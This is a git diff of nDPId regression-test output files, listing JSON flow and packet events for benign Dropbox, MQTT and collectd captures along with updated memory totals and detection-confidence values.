+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907271481,"flow_last_seen":1455907282686,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11720,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50311,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907274088,"flow_last_seen":1455907285181,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11794,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50312,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907272856,"flow_last_seen":1455907284046,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11820,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50318,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1455907275690,"flow_last_seen":1455907286608,"flow_idle_time":200000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":11742,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":50319,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1922,"flow_first_seen":1455907243976,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53522,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
+00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}} 
00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":8516,"packets-processed":8514,"total-skipped-flows":0,"total-l4-payload-len":294179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":16,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":91,"global_ts_msec":1455907286855} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 8516/8514 @@ -97,9 +97,9 @@ ~~ total active/idle flows...: 16/16 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6140441 bytes -~~ total memory freed........: 6140441 bytes -~~ total allocations/frees...: 126692/126692 +~~ total memory allocated....: 6274075 bytes +~~ total memory freed........: 6274075 bytes +~~ total allocations/frees...: 129454/129454 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 458 chars ~~ json string max len.......: 824 chars diff --git a/test/results/collectd.pcap.out b/test/results/collectd.pcap.out index b6bb84786..dd9faaa21 100644 --- a/test/results/collectd.pcap.out +++ b/test/results/collectd.pcap.out 
@@ -2,25 +2,25 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946742154132} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742154132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02208{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946742154132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1368,"pkt_l4_len":1334,"thread_ts_msec":946742154132,"pkt":"AAAAAAAAAAAAAAAACABFAAVKil5AAEARrUJ\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\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\/NZwADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKtmAAgADBiqh0qIgA6xAAMABjEAAAYADwABAgAAAAAABKpXAAgADBiqh0qIgBbKAAMABjIAAAYADwABAgAAAAAABKBGAAgADBiqh0qIgB0cAAMABjMAAAYADwABAgAAAAAABI2rAAgADBiqh0qIgCfPAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPsAAgADBiqh0qIgC9\/AAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0qIgDfpAAMABjIAAAYADwABAgAAAAAAAEdVAAgADBiqh0qIgD96AAMABjMAAAYADwABAgAAAAAAAD6AAAgADBiqh0qIgEcAAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAm"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742154132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"collectd.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742154132,"flow_last_seen":946742154132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742154132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36576,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"collectd.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742155132,"flow_last_seen":946742155132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742155132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36320,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02210{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"collectd.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946742155132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1368,"pkt_l4_len":1334,"thread_ts_msec":946742155132,"pkt":"AAAAAAAAAAAAAAAACABFAAVKil5AAEARrUJ\/AAABfwAAAY3gZOIFNgNKAAD\/\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\/5AAgADBiqh0gIg2eWAAIAC21lbW9yeQAAAwAFAAAEAAttZW1vcnkAAAUAC2NhY2hlZAAABgAPAAEBAAAAABRC50EACAAMGKqHSAiBMQAAAgAIY3B1AAADAAYyAAAEAAhjcHUAAAUADmludGVycnVwdAAABgAPAAECAAAAAAAA0OkACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAQc2xhYl91bnJlY2wAAAYADwABAQAAAADA25dBAAgADBiqh0gIgb+WAAIACGNwdQAAAwAGMgAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAOYXZhaWxhYmxlAAAGAA8AAQEAAAAA6E7rQQAFAAlmcmVlAAAGAA8AAQEAAAAAwJ+1QQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAgTKlBAAgADBiqh0qIftQ9AAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABaxWwAIAAwYqodKiH8nRwADAAYxAAAGAA8AAQIAAAAAABX6SQAIAAwYqodKiH9osQADAAYyAAAGAA8AAQIAAAAAABQajAAIAAwYqodKiH+V7gADAAYzAAAGAA8AAQIAAAAAABX6jAAIAAwYqodKiH\/NZwADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKtmAAgADBiqh0qIgA6xAAMABjEAAAYADwABAgAAAAAABKpXAAgADBiqh0qIgBbKAAMABjIAAAYADwABAgAAAAAABKBGAAgADBiqh0qIgB0cAAMABjMAAAYADwABAgAAAAAABI2rAAgADBiqh0qIgCfPAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPsAAgADBiqh0qIgC9\/AAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0qIgDfpAAMABjIAAAYADwABAgAAAAAAAEdVAAgADBiqh0qIgD96AAMABjMAAAYADwABAgAAAAAAAD6AAAgADBiqh0qIgEcAAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAm"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742156132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02210{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946742156132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1368,"pkt_l4_len":1334,"thread_ts_msec":946742156132,"pkt":"AAAAAAAAAAAAAAAACABFAAVKil5AAEARrUJ\/AAABfwAAAYzgZOIFNgNKAAAAFWRldmxhcC5mcml0ei5ib3gAAAgADBiqh0gIgY30AAkADAAAAAKAAAAA\/\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\/5AAgADBiqh0gIg2eWAAIAC21lbW9yeQAAAwAFAAAEAAttZW1vcnkAAAUAC2NhY2hlZAAABgAPAAEBAAAAABRC50EACAAMGKqHSAiBMQAAAgAIY3B1AAADAAYyAAAEAAhjcHUAAAUADmludGVycnVwdAAABgAPAAECAAAAAAAA0OkACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAQc2xhYl91bnJlY2wAAAYADwABAQAAAADA25dBAAgADBiqh0gIgb+WAAIACGNwdQAAAwAGMgAABAAIY3B1AAAFAApzdGVhbAAABgAPAAECAAAAAAAAAAAACAAMGKqHSAiDZ5YAAgALbWVtb3J5AAADAAUAAAQAC21lbW9yeQAABQAOYXZhaWxhYmxlAAAGAA8AAQEAAAAA6E7rQQAFAAlmcmVlAAAGAA8AAQEAAAAAwJ+1QQAFAA5zbGFiX3JlY2wAAAYADwABAQAAAAAgTKlBAAgADBiqh0qIftQ9AAIACGNwdQAAAwAGMAAABAAIY3B1AAAFAAl1c2VyAAAGAA8AAQIAAAAAABaxWwAIAAwYqodKiH8nRwADAAYxAAAGAA8AAQIAAAAAABX6SQAIAAwYqodKiH9osQADAAYyAAAGAA8AAQIAAAAAABQajAAIAAwYqodKiH+V7gADAAYzAAAGAA8AAQIAAAAAABX6jAAIAAwYqodKiH\/NZwADAAYwAAAFAAtzeXN0ZW0AAAYADwABAgAAAAAABKtmAAgADBiqh0qIgA6xAAMABjEAAAYADwABAgAAAAAABKpXAAgADBiqh0qIgBbKAAMABjIAAAYADwABAgAAAAAAB
KBGAAgADBiqh0qIgB0cAAMABjMAAAYADwABAgAAAAAABI2rAAgADBiqh0qIgCfPAAMABjAAAAUACXdhaXQAAAYADwABAgAAAAAAAEPsAAgADBiqh0qIgC9\/AAMABjEAAAYADwABAgAAAAAAAEPBAAgADBiqh0qIgDfpAAMABjIAAAYADwABAgAAAAAAAEdVAAgADBiqh0qIgD96AAMABjMAAAYADwABAgAAAAAAAD6AAAgADBiqh0qIgEcAAAMABjAAAAUACW5pY2UAAAYADwABAgAAAAAAAAAm"} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742156132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"collectd.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946742156132,"flow_last_seen":946742156132,"flow_idle_time":200000,"flow_min_l4_payload_len":1326,"flow_max_l4_payload_len":1326,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":1326,"midstream":0,"thread_ts_msec":946742156132,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36064,"dst_port":25826,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":4,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":3,"total-skipped-flows":0,"total-l4-payload-len":3978,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":946746151465} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"collectd.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"collectd.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946746151465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946746151465,"pkt":"AAAAAAAAAAAAAAAACABFAAVysRJAAAERFprAqLIj78BKQpqYZOIFXrI+AhAFVv\/\/dXNlcsEiWwf\/ecmHq20KMKY60TNgWTifxhUWZCzzOonut\/nBLF1H9\/qjrU5R7\/H5O\/9DCfuI7YKK9r+lg3rOUKcDtnx6k3gtNCOgHQsqM7rGW+eN33S1hv\/QWiqJh22vfUfr7Wz7pYGKApBiZvpQtTEhc5hAetf3FPDtHKTWmaIAv9tpMJ\/C1iMPcZFdIsr2dDPokYbKhkO7YK1VgRFBm2eTLctpolFTqtNDbNm7ZZj+J4aMD2mZJnGIwYcXGtrkRXSRyBums+W0\/jz8zVPv3F9mqHBPDINnDWvpLDLobIdObIJno8I9jJWIUvexsFajL\/Ozn6gm5h5Bbary3bFaI1eTK9\/2PtGLDA75C4TnHGlqTybsnLPrgfJgwREyLUHKyyjysSqq3nmcDjg2jxv7jB\/7C1x4ERVxqcLGWKVSyPtJGgd833gDOhBdG4xbUSAQLAZ93ZhNhqDYpSH1iLu4WeSFrvXELH+6cym0Y6TgPbHb995Xd4eeznstGpKVPXUMBMYKyolrAJf5IhADYmfwsVbHYwmMY4b+7dLe8Xm4J6pnNHkCQ8D8q\/xlIjpnUrS9OVed\/2DlDBS1QStbE\/5D9qtP1vKoQWi7aNQljNk4LIQq71gjvpOQoYs5A2fU7jqs5Cj7g1YVzvRN1szG+q0InctAJFWNqveI4E4VlH\/arcTeRtG6STEypPhnpvREi8Y1HMoKqCoQ2XNXh6LreKH8j13m7n5IUINrWLGczoOvwh46DPuvBo2KGeZrJslABigBIDcj82i9s8gLnjLw9\/JZ2x7gkouGNhGSwI6E+HHJlTbRNuUsv\/6rZpEcDEihG4n3z7Vt80LO+ANJQ1PEO96u3kHeqsvkky84XapbdS3hpG\/ZxbNSNY8nK4OCSOQQ8HmKfoJVs6uDOBd\/wp2958CwlilWA+S7vIiQ1XgDMWkpnLBj0SxBkzaVjTocJQTqqyWTwe3IhhIJv81ISkko8HlqeLw6ucXInaAjACXZe+tWeEVUOeFlwkGIIzC1N4S0VtZ61SexhHWzr\/i9+G9ZKKsehcu3XJBgh1f60wB6VdfrKhuC5O+DjSawaWC4SpBpu+HXc5ivM+uiz5tYgYFHvZZNAX520+pU7SYW1nlm8z8\/p7hrSy4or4XEkX6alUhb2dPGHzFD8JaAiNPkifbtDixhZdVcES3WwpR0Ee8a2+96wN6EZWNgwUs7rB2p7yVJHR76cDlQ4Kn2ZsRDtijNF38f24MQDLxP4V3sCe2kxcWUIAwjR6dboGGToHbd4gC7kvh\/FM9CeCXw8edRrjHiX4wnTLxVl9Tka0gXAevnElxIQ6DbX8f3r7039o6XRuqpxn0ACZ1UjAWdNP5AnrGPEDhQYcbCL1rrIoiDXNbcbYfPGBMR0rENIqKDB4er0OJ0AMEmws1dKMgg8kdYXjcu2lTLVY4\/4d9fGNXECu0E+IBVi1I\/a05N27robtMnHhQS3RLkMgdw2UHSJmRpgA2AeN7d5fzdRb1cndtHczkpZ4DqnETqYT245MmiMyzh
ppvI8TfDhCd1ynjvTf\/tCkooHN2LdiiRy3Nwel6jnMS4sDovy8cCEn9qicofWJUG7y5a\/VIh54v0RwEEnumWw\/ZdPXVhbMfahFcQa0uAqmRQ+1dUag87w7YOq0bDC6ojsLdQ0XEWCC562cwnsSkgbZ5fTl3ZKIGjfA5C2IbcoLoeLIRL87MyrjfoqdSbenCEN1JHvCKm8MwRfUxtBnRG6JvCJKg82EHDqygdxWBY5xyz+WlvhZcsZvu\/jKGESQRQiW2wuv9DlwnzHiLS\/qJ\/XT4Fpxe9+g=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"collectd.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946746151465,"flow_last_seen":946746151465,"flow_idle_time":200000,"flow_min_l4_payload_len":1366,"flow_max_l4_payload_len":1366,"flow_tot_l4_payload_len":1366,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":946746151465,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39577,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02292{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"collectd.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946746151465,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1408,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1408,"pkt_l4_len":1374,"thread_ts_msec":946746151465,"pkt":"AAAAAAAAAAAAAAAACABFAAVysRJAAAERFprAqLIj78BKQpqZZOIFXrI+AhD\/\/wAEdXNlcsEiWwf\/ecmHq20KMKY60TNgWTifxhUWZCzzOonut\/nBLF1H9\/qjrU5R7\/H5O\/9DCfuI7YKK9r+lg3rOUKcDtnx6k3gtNCOgHQsqM7rGW+eN33S1hv\/QWiqJh22vfUfr7Wz7pYGKApBiZvpQtTEhc5hAetf3FPDtHKTWmaIAv9tpMJ\/C1iMPcZFdIsr2dDPokYbKhkO7YK1VgRFBm2eTLctpolFTqtNDbNm7ZZj+J4aMD2mZJnGIwYcXGtrkRXSRyBums+W0\/jz8zVPv3F9mqHBPDINnDWvpLDLobIdObIJno8I9jJWIUvexsFajL\/Ozn6gm5h5Bbary3bFaI1eTK9\/2PtGLDA75C4TnHGlqTybsnLPrgfJgwREyLUHKyyjysSqq3nmcDjg2jxv7jB\/7C1x4ERVxqcLGWKVSyPtJGgd833gDOhBdG4xbUSAQLAZ93ZhNhqDYpSH1iLu4WeSFrvXELH+6cym0Y6TgPbHb995Xd4eeznstGpKVPXUMBMYKyolrAJf5IhADYmfwsVbHYwmMY4b+7dLe8Xm4J6pnNHkCQ8D8q\/xlIjpnUrS9OVed\/2DlDBS1QStbE\/5D9qtP1vKoQWi7aNQljNk4LIQq71gjvpOQoYs5A2fU7jqs5Cj7g1YV
zvRN1szG+q0InctAJFWNqveI4E4VlH\/arcTeRtG6STEypPhnpvREi8Y1HMoKqCoQ2XNXh6LreKH8j13m7n5IUINrWLGczoOvwh46DPuvBo2KGeZrJslABigBIDcj82i9s8gLnjLw9\/JZ2x7gkouGNhGSwI6E+HHJlTbRNuUsv\/6rZpEcDEihG4n3z7Vt80LO+ANJQ1PEO96u3kHeqsvkky84XapbdS3hpG\/ZxbNSNY8nK4OCSOQQ8HmKfoJVs6uDOBd\/wp2958CwlilWA+S7vIiQ1XgDMWkpnLBj0SxBkzaVjTocJQTqqyWTwe3IhhIJv81ISkko8HlqeLw6ucXInaAjACXZe+tWeEVUOeFlwkGIIzC1N4S0VtZ61SexhHWzr\/i9+G9ZKKsehcu3XJBgh1f60wB6VdfrKhuC5O+DjSawaWC4SpBpu+HXc5ivM+uiz5tYgYFHvZZNAX520+pU7SYW1nlm8z8\/p7hrSy4or4XEkX6alUhb2dPGHzFD8JaAiNPkifbtDixhZdVcES3WwpR0Ee8a2+96wN6EZWNgwUs7rB2p7yVJHR76cDlQ4Kn2ZsRDtijNF38f24MQDLxP4V3sCe2kxcWUIAwjR6dboGGToHbd4gC7kvh\/FM9CeCXw8edRrjHiX4wnTLxVl9Tka0gXAevnElxIQ6DbX8f3r7039o6XRuqpxn0ACZ1UjAWdNP5AnrGPEDhQYcbCL1rrIoiDXNbcbYfPGBMR0rENIqKDB4er0OJ0AMEmws1dKMgg8kdYXjcu2lTLVY4\/4d9fGNXECu0E+IBVi1I\/a05N27robtMnHhQS3RLkMgdw2UHSJmRpgA2AeN7d5fzdRb1cndtHczkpZ4DqnETqYT245MmiMyzhppvI8TfDhCd1ynjvTf\/tCkooHN2LdiiRy3Nwel6jnMS4sDovy8cCEn9qicofWJUG7y5a\/VIh54v0RwEEnumWw\/ZdPXVhbMfahFcQa0uAqmRQ+1dUag87w7YOq0bDC6ojsLdQ0XEWCC562cwnsSkgbZ5fTl3ZKIGjfA5C2IbcoLoeLIRL87MyrjfoqdSbenCEN1JHvCKm8MwRfUxtBnRG6JvCJKg82EHDqygdxWBY5xyz+WlvhZcsZvu\/jKGESQRQiW2wuv9DlwnzHiLS\/qJ\/XT4Fpxe9+g=="} 